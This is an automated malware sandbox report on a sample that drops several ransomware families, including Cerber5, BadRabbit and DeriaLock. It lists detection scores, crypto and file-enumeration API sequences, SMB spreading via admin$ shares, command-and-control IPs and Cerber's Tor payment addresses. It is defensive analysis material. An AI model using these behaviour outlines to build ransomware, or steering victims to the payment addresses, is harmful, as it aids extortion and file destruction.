Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Metadefender: Detection: 82%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Metadefender: Detection: 77%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	ReversingLabs: Detection: 90%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Metadefender: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Metadefender: Detection: 68%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	Metadefender: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	ReversingLabs: Detection: 96%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	Metadefender: Detection: 86%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	ReversingLabs: Detection: 90%
Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	Metadefender: Detection: 72%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Fantom.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\Fantom.exe	Metadefender: Detection: 65%	Perma Link
Source: C:\Windows\dispci.exe	ReversingLabs: Detection: 96%
Source: C:\Windows\dispci.exe	Metadefender: Detection: 85%	Perma Link

Machine Learning detection for sample

Source: irH9zMhZub.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe	Joe Sandbox ML: detected
Source: C:\Windows\dispci.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Fantom.exe	Joe Sandbox ML: detected

Source: 32.2.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 1.0.Endermanch@BadRabbit.exe.1320000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 40.2.Endermanch@Cerber5.exe.4df0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 38.0.Endermanch@Birele.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 49.0.Endermanch@BadRabbit.exe.1320000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 4.0.Endermanch@BadRabbit.exe.1320000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 32.0.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 58.2.Endermanch@Cerber5.exe.4e10000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 10.0.Endermanch@BadRabbit.exe.1320000.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 1.0.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 49.0.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 55.0.Endermanch@Birele.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 40.2.Endermanch@Cerber5.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 14.0.Endermanch@Birele.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.Endermanch@BadRabbit.exe.1320000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.0.Endermanch@Birele.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.Endermanch@Birele.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 8.0.Endermanch@Birele.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.Endermanch@Birele.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.Endermanch@Birele.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.Endermanch@Birele.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.Endermanch@Birele.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.2.Endermanch@Cerber5.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 10.2.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 1.0.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 4.0.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 10.0.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 49.0.Endermanch@BadRabbit.exe.1320000.1.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 32.0.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.Endermanch@Birele.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.2.Endermanch@Cerber5.exe.5e70000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 1.0.Endermanch@BadRabbit.exe.1320000.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 55.0.Endermanch@Birele.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.Endermanch@BadRabbit.exe.1320000.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 38.0.Endermanch@Birele.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.Endermanch@BadRabbit.exe.1320000.3.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 49.2.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 55.0.Endermanch@Birele.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.Endermanch@Birele.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 58.2.Endermanch@Cerber5.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen7
Source: 4.0.Endermanch@BadRabbit.exe.1320000.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 55.0.Endermanch@Birele.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 49.0.Endermanch@BadRabbit.exe.1320000.2.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 1.2.Endermanch@BadRabbit.exe.1320000.0.unpack	Avira: Label: TR/ATRAPS.Gen

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,	3_2_007B5A73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,	3_2_007B5613
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B6299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,	3_2_007B6299
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B6085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,	3_2_007B6085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,	3_2_007B554A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,CloseHandle,CryptDestroyKey,SetEvent,	3_2_007B5D0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,	3_2_007B5507
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,	3_2_007B5BC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B15A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_007B15A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B6246 CryptCreateHash,CryptHashData,CryptGetHashParam,	3_2_007B6246
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B56D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,	3_2_007B56D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,	3_2_007B559B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,	3_2_007B5780
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040AD62 CryptAcquireContextW,	19_2_0040AD62
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B17E CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,	19_2_0040B17E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B11B CryptAcquireContextW,	19_2_0040B11B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040AD86 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,	19_2_0040AD86
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040AF69 CryptAcquireContextW,	19_2_0040AF69
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00404B6E CryptAcquireContextW,CryptGenRandom,	19_2_00404B6E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_004027DD CryptDestroyKey,	19_2_004027DD
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040AFFE memcpy,CryptEncrypt,CryptDestroyKey,	19_2_0040AFFE
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040AF8D memcpy,CryptImportKey,	19_2_0040AF8D
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00401000 lstrlen,StrPBrkA,memset,StrSpnA,CryptStringToBinaryA,	19_2_00401000
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B146 CryptGetKeyParam,	19_2_0040B146
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040194B SetFilePointerEx,ReadFile,CryptEncrypt,SetFilePointerEx,WriteFile,Sleep,CryptDestroyKey,	19_2_0040194B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_004011E3 CryptBinaryToStringA,	19_2_004011E3
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_004011B0 CryptBinaryToStringA,	19_2_004011B0
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B253 CryptImportKey,	19_2_0040B253
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_004026FE CryptDestroyKey,	19_2_004026FE
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040B283 memcpy,CryptEncrypt,memcpy,CryptEncrypt,	19_2_0040B283
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040AD62 CryptAcquireContextW,	40_2_0040AD62
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040AD86 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,	40_2_0040AD86
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00401000 lstrlen,StrPBrkA,memset,StrSpnA,CryptStringToBinaryA,	40_2_00401000
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B146 CryptGetKeyParam,	40_2_0040B146
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040194B SetFilePointerEx,ReadFile,CryptEncrypt,SetFilePointerEx,WriteFile,Sleep,CryptDestroyKey,	40_2_0040194B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B17E CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,	40_2_0040B17E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B11B CryptAcquireContextW,	40_2_0040B11B
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_004011E3 CryptBinaryToStringA,	40_2_004011E3
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_004011B0 CryptBinaryToStringA,	40_2_004011B0
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B253 CryptImportKey,	40_2_0040B253
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_004026FE CryptDestroyKey,	40_2_004026FE
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040B283 memcpy,CryptEncrypt,memcpy,CryptEncrypt,	40_2_0040B283
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040AF69 CryptAcquireContextW,	40_2_0040AF69
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00404B6E CryptAcquireContextW,CryptGenRandom,	40_2_00404B6E
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_004027DD CryptDestroyKey,	40_2_004027DD
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040AFFE memcpy,CryptEncrypt,CryptDestroyKey,	40_2_0040AFFE
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040AF8D memcpy,CryptImportKey,	40_2_0040AF8D

Exploits

Connects to many different private IPs (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.0:139	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:139	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior

Connects to many different private IPs via SMB (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.0:139	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.2:139	Jump to behavior
Source: global traffic	TCP traffic: 192.168.2.1:445	Jump to behavior

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 19.2.Endermanch@Cerber5.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 40.2.Endermanch@Cerber5.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Unpacked PE file: 58.2.Endermanch@Cerber5.exe.400000.0.unpack

Source: irH9zMhZub.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49719 version: TLS 1.2

Source: irH9zMhZub.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe.0.dr
Source:	Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe.0.dr
Source:	Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000002C.00000000.315487934.0000000000DD2000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@DeriaLock.exe.0.dr
Source:	Binary string: dcrypt.pdb source: rundll32.exe, 00000003.00000003.306545388.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.300766034.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, cscc.dat.3.dr

Spreading

Contains functionality to enumerate network shares of other devices

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B9534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$		3_2_007B9534
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B9B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$		3_2_007B9B63

Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: z:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: x:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: v:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: t:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: r:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: p:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: n:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: l:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: j:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: h:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: f:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: b:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: y:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: w:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: u:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: s:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: q:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: o:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: m:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: k:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: i:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: g:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: e:
Source: C:\Windows\SysWOW64\fsutil.exe	File opened: c:
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	File opened: a:

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B5E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,	3_2_007B5E9F
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,	19_2_00409857
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,	19_2_0040A419
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 19_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,	19_2_00401423
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00409857 CoInitialize,GetSystemDirectoryW,SHGetFileInfoW,lstrlenW,SHGetFileInfoW,lstrlenW,SHGetFolderPathW,FindFirstFileW,lstrlenW,CharLowerBuffW,FindNextFileW,FindClose,	40_2_00409857
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_0040A419 wsprintfW,GetFileAttributesW,GetFileSecurityW,GetSecurityDescriptorOwner,EqualSid,GetFileAttributesW,SetFileAttributesW,lstrcatW,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,WaitForSingleObject,lstrlenW,lstrlenW,CharLowerBuffW,Sleep,StrChrW,FindNextFileW,FindClose,	40_2_0040A419
Source: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe	Code function: 40_2_00401423 lstrlenW,FindFirstFileW,PathMatchSpecW,FindNextFileW,	40_2_00401423

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.0 139	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 23.50.106.206 445	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.2 139	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.1 445	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023613 ET TROJAN Ransomware/Cerber Checkin M3 (2) 192.168.2.6:59083 -> 93.107.12.0:6893
Source: Traffic	Snort IDS: 2824087 ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity 192.168.2.6:49767 -> 162.55.0.137:80

Found Tor onion address

Source: Endermanch@Cerber5.exe, 00000013.00000002.477824188.00000000063D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://{TOR}.onion/{PC_ID}
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>type or copy the add<span class="h">LU</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in this browser address bar;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br></li>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>typ of kopieer het a<span class="h">fEIb6Ps</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in de adresbalk van uw browser;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> dans cette barre d
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in diese Browser-Adressleiste;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nella barra degli indirizzi di questo browser;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> do paska adresu przegl
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nesta barra de endere
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> en la barra de direcciones de este navegador;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000002.517214443.00000000063F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
Source: Endermanch@Cerber5.exe, 00000013.00000003.307919338.00000000063C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://{TOR}.onion/{PC_ID}
